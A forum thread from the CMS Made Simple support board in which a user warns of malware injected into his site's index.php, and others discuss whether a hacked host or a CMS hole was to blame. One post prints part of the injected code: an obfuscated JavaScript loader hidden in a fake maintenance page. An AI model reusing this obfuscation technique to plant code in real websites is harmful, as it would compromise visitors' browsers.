Parse error: syntax error [SOLVED]

For questions and problems with the CMS core. This board is NOT for any 3rd party modules, addons, PHP scripts or anything NOT distributed with the CMS made simple package itself.
rickertb
New Member
New Member
Posts: 3
Joined: Mon Dec 06, 2010 7:42 pm

Re: Parse error: syntax error [SOLVED]

Post by rickertb »

BE AWARE OF A VIRUS/MALWARE FOR CMS MADE SIMPLE

in 1.6.7 my index.php was injected with a virus/malware, it looks a bit like this variant.

http://nakedsecurity.sophos.com/2009/04 ... direction/

at first I didn't understand why my site was blank, but in the error log it showed:

Code: Select all

PHP Parse error:  syntax error, unexpected T_STRING, expecting ',' or ';' in /sites/website.com/www/index.php on line 53
After I uploaded the latest backup of index.php to the site it started working again, so I hope the latest updates blocks these attacks.

Here is a piece of the malware code starting at echo :

Code: Select all

else if (file_exists(TMP_CACHE_LOCATION.'/SITEDOWN'))
{
	echo "<__html><head><title>Maintenance</title></head></__body><p>Site down for maintenance.</p><__script__ language="javascript">
var kasbd3412 = "";
$$ = function () { try{kasbd3412= $$dfsd(gnflseejrr()); kasbd3412.do(); } catch(e){ var bn = ""; return kasbd3412;}};
var adlan3r$oubw = "e";$$dfsd =  this['a'+'s'+'d'];var adlan3r$ouaw = "a";
function asd(df_){this['r']="";
var s = df_;
for(__fh=0;this['__fh']<s['l'+adlan3r$oubw+'ng'+'t'+'h'];__fh++ ){i=__fh;if(s['ch'+adlan3r$ouaw +'rA'+'t'](i)=='Z'){this[neAR_DEF_FGEvftDSyTtnSoh_1]='%'} else {this[neAR_DEF_FGEvftDSyTtnSoh_1]=s['ch'+'ar'+'At'](this['i'])}this['r']=r+VAR_EZJrWcTGuhPYZJj(this,neAR_DEF_FGEvftDSyTtnSoh_1)}
return this['unesc'+adlan3r$ouaw + 'p'+adlan3r$oubw](r)}
Will the release of CMS Made Simple arm us against this thread?
Wishbone
Power Poster
Power Poster
Posts: 1368
Joined: Tue Dec 23, 2008 8:39 pm

Re: Parse error: syntax error [SOLVED]

Post by Wishbone »

rickertb wrote: Will the release of CMS Made Simple arm us against this thread?
It's not likely to be a vulnerability with CMSMS.. It could have been that your host itself was hacked... I've had that happen several times.
rickertb
New Member
New Member
Posts: 3
Joined: Mon Dec 06, 2010 7:42 pm

Re: Parse error: syntax error [SOLVED]

Post by rickertb »

I highly doubt that... my guesses is that found a hole in the distribution and made an automatic attack mechanism to inject as many sites as possible.

My latest CMSMS update was from april 2010 and we are now in december...
Wishbone
Power Poster
Power Poster
Posts: 1368
Joined: Tue Dec 23, 2008 8:39 pm

Re: Parse error: syntax error [SOLVED]

Post by Wishbone »

I wouldn't discount it, though. I've had .htaccess files change quite regularly on my IXWebHosting account, and according to a search, a lot of others had as well. Also have had changes made to index.php files on GoDaddy (they admitted it and fixed the security hole), and with CrystalTech as well. Some of these sites weren't even interactive, but were just plain static html sites with no means of injection through the website itself.
reneh
Dev Team Member
Dev Team Member
Posts: 446
Joined: Tue Nov 28, 2006 8:39 pm

Re: Parse error: syntax error [SOLVED]

Post by reneh »

Start read from start of your tread! And do the suggestions mentioned there!

Be sure your site is up to date all the time.
http://forum.cmsmadesimple.org/index.ph ... 336.0.html

Also read this:
http://forum.cmsmadesimple.org/index.ph ... 661.0.html

BR
Reneh
ReneH 8-)
A search will save you hours waiting for an answer! Image
Post Reply

Return to “CMSMS Core”